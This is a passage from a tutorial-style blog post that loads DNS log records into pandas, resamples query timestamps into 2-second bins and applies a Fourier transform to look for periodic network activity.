<span style="color: white;">1 1.696122e+09 10.0.0.4 45084 172.17.17.202 4.0.0.10.in-addr.arpa</span>
<span style="color: white;">2 1.696122e+09 10.0.0.4 50481 172.17.17.202 37.0.0.10.in-addr.arpa</span>
<span style="color: white;">3 1.696122e+09 10.0.0.4 50481 172.17.17.202 37.0.0.10.in-addr.arpa</span>
<span style="color: white;">4 1.696122e+09 10.0.0.4 57870 172.17.17.202 2.0.0.10.in-addr.arpa</span>
</pre></div>
</div><div><br /></div><div><div>Here is the full example of one of these times</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns.ts[1]</span>
<span style="color: white;">1696122000.366851</span>
</pre></div>
</div><div><br /></div><div><div>Let's get this time into a format we can understand. More specifically, put it into a time that gives us the seconds.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns.ts[1].astype(dtype='datetime64[s]')</span>
<span style="color: white;">numpy.datetime64('2023-10-01T01:00:00')</span>
</pre></div>
</div><div><br /></div><div><div>Changing all the times to more human readable time</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns['ts'] = df_dns['ts'].astype(dtype='datetime64[s]')</span>
<span style="color: white;">df_dns</span>
<span style="color: white;">ts id.orig_h id.orig_p id.resp_h query</span>
<span style="color: white;">0 2023-10-01 01:00:00 10.0.0.4 45084 172.17.17.202 4.0.0.10.in-addr.arpa</span>
<span style="color: white;">1 2023-10-01 01:00:00 10.0.0.4 45084 172.17.17.202 4.0.0.10.in-addr.arpa</span>
<span style="color: white;">2 2023-10-01 01:00:00 10.0.0.4 50481 172.17.17.202 37.0.0.10.in-addr.arpa</span>
<span style="color: white;">3 2023-10-01 01:00:00 10.0.0.4 50481 172.17.17.202 37.0.0.10.in-addr.arpa</span>
<span style="color: white;">4 2023-10-01 01:00:00 10.0.0.4 57870 172.17.17.202 2.0.0.10.in-addr.arpa</span>
<span style="color: white;">... ... ... ... ... ...</span>
<span style="color: white;">8212 2023-10-01 01:59:57 10.0.0.8 45024 172.17.17.198 3.pool.ntp.org</span>
<span style="color: white;">8213 2023-10-01 01:59:57 10.0.0.8 47334 172.17.17.198 time.google.com</span>
<span style="color: white;">8214 2023-10-01 01:59:58 10.0.0.9 40965 10.0.0.2 somedomain.securitynik.local</span>
<span style="color: white;">8215 2023-10-01 01:59:59 10.0.0.24 36625 10.0.0.2 i.ytimg.com</span>
<span style="color: white;">8216 2023-10-01 01:59:59 10.0.0.24 58969 10.0.0.2 youtubei.googleapis.com</span>
<span style="color: white;">8217 rows × 5 columns</span>
</pre></div>
</div><div><br /></div><div><div>I would like this data to be between 01:00 - 02:00 AM. Primary reason is, it is easier for me to monitor my sampling period. Let's verify there is no data outside of this range. This returns one record. Not a major concern but I will still drop it.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns[df_dns.ts < '2023-10-01 01:00:00' ]</span>
<span style="color: white;">ts id.orig_h id.orig_p id.resp_h query</span>
<span style="color: white;">48 2023-10-01 00:59:55 10.0.0.10 5353 224.0.0.251 _googlecast._tcp.local</span>
</pre></div>
</div><div><br /></div><div><div>Dropping the one record above</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns.drop(df_dns[df_dns.ts < '2023-10-01 01:00:00' ].index, inplace=True)</span>
</pre></div>
</div><div><br /></div><div>Any records greater than 1:59?. Looks like there is none.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">ts id.orig_h id.orig_p id.resp_h query</span>
</pre></div>
</div><div><br /></div><div>Sort the timestamp (ts) column. Start from 01:00 am to get to 1:59 am</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">df_dns.sort_values(by='ts', ascending=True)</span>
<span style="color: white;">df_dns</span>
<span style="color: white;">s id.orig_h id.orig_p id.resp_h query</span>
<span style="color: white;">0 2023-10-01 01:00:00 10.0.0.4 45084 172.17.17.202 4.0.0.10.in-addr.arpa</span>
<span style="color: white;">1 2023-10-01 01:00:00 10.0.0.4 45084 172.17.17.202 4.0.0.10.in-addr.arpa</span>
<span style="color: white;">2 2023-10-01 01:00:00 10.0.0.4 50481 172.17.17.202 37.0.0.10.in-addr.arpa</span>
<span style="color: white;">3 2023-10-01 01:00:00 10.0.0.4 50481 172.17.17.202 37.0.0.10.in-addr.arpa</span>
<span style="color: white;">4 2023-10-01 01:00:00 10.0.0.4 57870 172.17.17.202 2.0.0.10.in-addr.arpa</span>
<span style="color: white;">... ... ... ... ... ...</span>
<span style="color: white;">8212 2023-10-01 01:59:57 10.0.0.8 45024 172.17.17.198 3.pool.ntp.org</span>
<span style="color: white;">8213 2023-10-01 01:59:57 10.0.0.8 47334 172.17.17.198 time.google.com</span>
<span style="color: white;">8214 2023-10-01 01:59:58 10.0.0.9 40965 10.0.0.2 somedomain.securitynik.local</span>
<span style="color: white;">8215 2023-10-01 01:59:59 10.0.0.24 36625 10.0.0.2 i.ytimg.com</span>
<span style="color: white;">8216 2023-10-01 01:59:59 10.0.0.24 58969 10.0.0.2 youtubei.googleapis.com</span>
<span style="color: white;">8216 rows × 5 columns</span>
</pre></div>
</div><div><br /></div><div>Visualize the time period</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">fig = px.histogram(data_frame=df_dns, x='ts', title='Originator IP Bytes Between 1 and 2 AM')</span>
<span style="color: white;">fig.show()</span>
</pre></div>
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUd5hF9O8JqL3TCP0xWpSyxuZxstDxfifi1ODNPHPPkIg0QPdrUXydpxUu2fdAWPg9wCowcz8GPy2haSklmFSwAoqfN6QKztVbqDIGRz0ZpQOgy8Ydp90Hv_-pdIH0hMX5kOSGJ5WlGMYrW2zpChrquQJ0zfozQnOPE_em9zP_14NlQB5-qo0FlA4HyOU/s1138/Fourier%20Time%20Plot.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="1138" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUd5hF9O8JqL3TCP0xWpSyxuZxstDxfifi1ODNPHPPkIg0QPdrUXydpxUu2fdAWPg9wCowcz8GPy2haSklmFSwAoqfN6QKztVbqDIGRz0ZpQOgy8Ydp90Hv_-pdIH0hMX5kOSGJ5WlGMYrW2zpChrquQJ0zfozQnOPE_em9zP_14NlQB5-qo0FlA4HyOU/w640-h254/Fourier%20Time%20Plot.png" width="640" /></a></div><div>The sampling rate must be at least 2* the highest frequency we're trying to find.</div><div><a href="https://www.allaboutcircuits.com/technical-articles/nyquist-shannon-theorem-understanding-sampled-systems/" target="_blank">https://www.allaboutcircuits.com/technical-articles/nyquist-shannon-theorem-understanding-sampled-systems/</a></div><div>Above, the time span is 1 hour or 60 minutes or 3600 seconds</div><div>We then need to sample this signal at a rate of at least 2 times the highest frequency</div><div>Since this is in seconds, the highest frequency is 3600</div><div>Hence we need to sample preferably uniformly at a rate of at least 2*3600</div><div>Sampling at a rate of at least 2*3600 allows us to be able to reconstruct the original signal in the time domain, from the frequency domain if needed</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sampling_period = 3600</span>
<span style="color: white;">sampling_period</span>
</pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><br /></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">3600</span></pre></div>
</div><div><br /></div><div>The sampling rate is every 1 second. Hence we do 1./3600 to get the frequency per second</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">1./sampling_period</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"><br /></span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">0.0002777777777777778</span></pre></div></div><div><br /></div></div><div>To get the frequency per minute or per 60 seconds, we do (1/.3600) * 60</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;">(1./sampling_period) * 60</span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;"><br /></span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;">0.016666666666666666</span></div></pre></div></div></div><div><br /></div><div><div><div>Which also means, to get any frequency in between, we just multiply by that number of seconds.</div><div>Or for 2 seconds</div></div><div><br /></div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;">(1./sampling_period) * 2</span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;"><br /></span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;">0.0005555555555555556</span></div></pre></div></div><div><br /></div><div>Extract the timestamp column and add it to its own Pandas series</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;">tmp_data = df_dns['ts']</span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;">tmp_data, type(tmp_data)
(0 2023-10-01 01:00:00
1 2023-10-01 01:00:00
2 2023-10-01 01:00:00
3 2023-10-01 01:00:00
4 2023-10-01 01:00:00
...
8212 2023-10-01 01:59:57
8213 2023-10-01 01:59:57
8214 2023-10-01 01:59:58
8215 2023-10-01 01:59:59
8216 2023-10-01 01:59:59
Name: ts, Length: 8216, dtype: datetime64[s],
pandas.core.series.Series)</span></div></pre></div></div></div><div><br /></div><div><div>Replace the index column with the timestamp</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">tmp_data.index = tmp_data</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">tmp_data
ts
2023-10-01 01:00:00 2023-10-01 01:00:00
2023-10-01 01:00:00 2023-10-01 01:00:00
2023-10-01 01:00:00 2023-10-01 01:00:00
2023-10-01 01:00:00 2023-10-01 01:00:00
2023-10-01 01:00:00 2023-10-01 01:00:00
...
2023-10-01 01:59:57 2023-10-01 01:59:57
2023-10-01 01:59:57 2023-10-01 01:59:57
2023-10-01 01:59:58 2023-10-01 01:59:58
2023-10-01 01:59:59 2023-10-01 01:59:59
2023-10-01 01:59:59 2023-10-01 01:59:59
Name: ts, Length: 8216, dtype: datetime64[s]</span></pre></div></div></div><div><br /></div></div><div><div>Using knowledge of 2 seconds as was seen via the tcpdump as my guide</div><div>You can try to use 1 second but I don't think it will find anything meaningful. I can be wrong!</div><div>I don't think 1 second would be representative of a real problem</div><div>Set my period of 2 seconds </div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">best_period = '2s' </span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">best_period</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"><br /></span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">'2s'</span></pre></div></div></div><div><br /></div></div><div><div>Get a count of the data points occurring every 2 seconds and print the first 10 entries</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">counts_per_period = tmp_data.resample(best_period).count()</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
# Print the first 10 entries
counts_per_period[:10], len(counts_per_period)
(ts
2023-10-01 01:00:00 30
2023-10-01 01:00:02 13
2023-10-01 01:00:04 7
2023-10-01 01:00:06 2
2023-10-01 01:00:08 4
2023-10-01 01:00:10 4
2023-10-01 01:00:12 15
2023-10-01 01:00:14 2
2023-10-01 01:00:16 1
2023-10-01 01:00:18 1
Freq: 2S, Name: ts, dtype: int64,
1800)</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><br /></pre></div></div></div><div><br /></div><div>Confirm the type is a Pandas Series</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">type(counts_per_period)</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
pandas.core.series.Series</span></pre></div></div></div><div><br /></div><div><div>Take a look inside the keys. This shows the 2 second periods</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">counts_per_period.keys()</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
DatetimeIndex(['2023-10-01 01:00:00', '2023-10-01 01:00:02',
'2023-10-01 01:00:04', '2023-10-01 01:00:06',
'2023-10-01 01:00:08', '2023-10-01 01:00:10',
'2023-10-01 01:00:12', '2023-10-01 01:00:14',
'2023-10-01 01:00:16', '2023-10-01 01:00:18',
...
'2023-10-01 01:59:40', '2023-10-01 01:59:42',
'2023-10-01 01:59:44', '2023-10-01 01:59:46',
'2023-10-01 01:59:48', '2023-10-01 01:59:50',
'2023-10-01 01:59:52', '2023-10-01 01:59:54',
'2023-10-01 01:59:56', '2023-10-01 01:59:58'],
dtype='datetime64[s]', name='ts', length=1800, freq='2S')</span></pre></div></div></div><div><br /></div><div><div>Extract the values occurring at those timestamps</div><div>Let's call it x for now</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">x = counts_per_period.values</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">x
array([30, 13, 7, ..., 1, 19, 3], dtype=int64)</span></pre></div></div></div><div><br /></div></div><div><div>Get the length of x. Because the sampling was done for 1 hour or 3600 seconds, by looking at the data from 2 seconds perspective, we now have 1800 data points</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">len(x)</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
1800</span></pre></div></div></div><div><br /></div><div>Plot the values in x</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">plt.title('Plot of of the values in x')</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">plt.plot(x)
plt.xlabel(xlabel='Time in 2secs window')
plt.ylabel(ylabel='Counts Per Period')
plt.show()
</span></pre></div></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd0fNX2_HECG2ybvU3fpRUj60gZ40gEX1kReUQNERoczdZ_AWDzqkC4WHwoSJNF4UvS7gHmSscknWCWzUska5Ar50y_fIcQwOX38BcnvKizKwH-Jq2Q-iief-QD8LSUfzHrySZH8p59AybQTM94Ch43Xb7rXCI5sjMzMjo9fJisi9GKO7630ofkVHuSOA/s571/samples%20in%202%20seconds%20window.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="571" height="510" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd0fNX2_HECG2ybvU3fpRUj60gZ40gEX1kReUQNERoczdZ_AWDzqkC4WHwoSJNF4UvS7gHmSscknWCWzUska5Ar50y_fIcQwOX38BcnvKizKwH-Jq2Q-iief-QD8LSUfzHrySZH8p59AybQTM94Ch43Xb7rXCI5sjMzMjo9fJisi9GKO7630ofkVHuSOA/w640-h510/samples%20in%202%20seconds%20window.png" width="640" /></a></div><div>Definitely from above we can see some spikes. This suggest some 2 seconds period have a large amount of counts. </div><div><br /></div><div>Get the Fourier Transform of the signal. Notice the result is a complex number, consisting of the real and imaginary component</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">fourier = np.fft.fft(x)</span>
<span style="color: white;">fourier, len(fourier)</span>
<span style="color: white;">(array([ 8216. +0.j , 1913.98722741 -956.73902893j,</span>
<span style="color: white;"> 18.18684807-1246.50554465j, ..., -1694.41853886 +611.36477164j,</span>
<span style="color: white;"> 18.18684807+1246.50554465j, 1913.98722741 +956.73902893j]),</span>
<span style="color: white;"> 1800)</span>
</pre></div>
</div><div><br /></div><div><div>Plot the values as is before finding the absolute values. Even though we used Fourier Transform, the x axis is still the number of samples rather than the frequency. This can be confirmed by the 1800 of the x axis. Notice above, there is 1800 at the bottom of the cell</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">plt.title(label='Plot before finding the absolute values')</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">plt.plot(fourier)
plt.xlabel(xlabel='samples')
plt.ylabel(ylabel='amplitude before normalize')
plt.show()
C:\Users\SecurityNik\AppData\Roaming\Python\Python39\site-packages\matplotlib\cbook\__init__.py:1340: ComplexWarning:
Casting complex values to real discards the imaginary part</span></pre></div></div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwZxPJ6oQREpZdTaaPsnZDiVG1Zcs5VjokhREwe2TuJcA4_3t1CgAUBnwZKU425dILQudYSVLfKd54Zjjs0e8WSQ41_wUpFHEuSg-mJZ8mE8T0rmQz2wrXyU_AWx9QqYrT56hcBA0PrWO6wLPIYRiCLCi8-18tPIZ-5p64qZo05ipd0YWS3TAcUGDkHEM/s591/Casting%20Complex%20Compelx%20Number.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="591" height="493" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwZxPJ6oQREpZdTaaPsnZDiVG1Zcs5VjokhREwe2TuJcA4_3t1CgAUBnwZKU425dILQudYSVLfKd54Zjjs0e8WSQ41_wUpFHEuSg-mJZ8mE8T0rmQz2wrXyU_AWx9QqYrT56hcBA0PrWO6wLPIYRiCLCi8-18tPIZ-5p64qZo05ipd0YWS3TAcUGDkHEM/w640-h493/Casting%20Complex%20Compelx%20Number.png" width="640" /></a></div><br /><div><div>Plot the values as is after finding the absolute values. We can see the symmetry in both the graph below and the one above. Even though we used Fourier Transform, the x axis is still the number of samples rather than the frequency. Notice the Y axis also goes to negative values.</div></div></div><div><br /></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">plt.title(label='Amplitude - After finding the absolute values')</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">plt.plot(np.abs(fourier))
plt.xlabel(xlabel='samples')
plt.ylabel(ylabel='amplitude before normalize')
plt.show()</span></pre></div></div></div><div><br /></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizvY4M4FMLw_4Pdzc8yZq8o8AuUYUV2LPrvreHga9y9p8qsxjy5GWl-YHQ4-jd5dJ4-_tpCd_0JmQvMVmtszQ0wMJaS-ruckcXwD98ClDo7ncpbG4bhUwRC3GI8QUeI0W-DD3Ij1_9mC4WqdE4rlrwL0Ahpwct0_5IUG9e5ySN90fu44A5Rzozz1ILsMM/s580/Amplitude%20Absolute%20Values.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="580" height="502" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizvY4M4FMLw_4Pdzc8yZq8o8AuUYUV2LPrvreHga9y9p8qsxjy5GWl-YHQ4-jd5dJ4-_tpCd_0JmQvMVmtszQ0wMJaS-ruckcXwD98ClDo7ncpbG4bhUwRC3GI8QUeI0W-DD3Ij1_9mC4WqdE4rlrwL0Ahpwct0_5IUG9e5ySN90fu44A5Rzozz1ILsMM/w640-h502/Amplitude%20Absolute%20Values.png" width="640" /></a></div><br /><div><div>Let's normalize the FFT output. </div><div>Remember, Shannon Nyquist states if we sample a signal at a rate of at least 2 times the highest frequency, the analog signal can be recovered perfectly</div><div><br /></div><div>At the same time, setup the sampling period. These logs are for an hour 01:00 to 01:59. I am keeping this because my original log was for that period. When we resampled the data above by 2 seconds, it returned 1800 records.</div><div><br /></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">N = len(x)</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">normalize = N/2
sampling_period = 3600
len(x), N, normalize, sampling_period
(1800, 1800, 900.0, 3600)</span></pre></div></div></div><div><br /></div><div><div>Plot the absolute value of the amplitude</div></div><div><br /></div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">plt.title(label='Normalize amplitude values')</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">plt.plot(np.abs(fourier)/normalize)
plt.xlabel(xlabel='samples')
plt.ylabel(ylabel='amplitude after normalization')
plt.show()</span></pre></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2HuN1oyvjsssoWOW4UjlRKQSIqmwaHmXxODdcoDaiVMX5GISgclIs3nzDgIzaJ_foFE0KEd_bBfHLp_CMY1GY4xCV5v1vQ87Cpz-_Ut0dow-SdHUFtMxDTud1W0eqm8EncK0bQtB33MknjFdrEDMMTX4XMyeR2ib3Xco9n8RIaMX6StFzjk5qXkhTKlU/s554/normalized%20amplitude.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="554" height="526" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2HuN1oyvjsssoWOW4UjlRKQSIqmwaHmXxODdcoDaiVMX5GISgclIs3nzDgIzaJ_foFE0KEd_bBfHLp_CMY1GY4xCV5v1vQ87Cpz-_Ut0dow-SdHUFtMxDTud1W0eqm8EncK0bQtB33MknjFdrEDMMTX4XMyeR2ib3Xco9n8RIaMX6StFzjk5qXkhTKlU/w640-h526/normalized%20amplitude.png" width="640" /></a></div><br /><div>Need to fix the frequency. We are sampling at every one second in the hour. This is where I am using the 3600 rather than the 1800</div><div><br /></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">frequency_rate = 1./sampling_period</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">frequency_rate
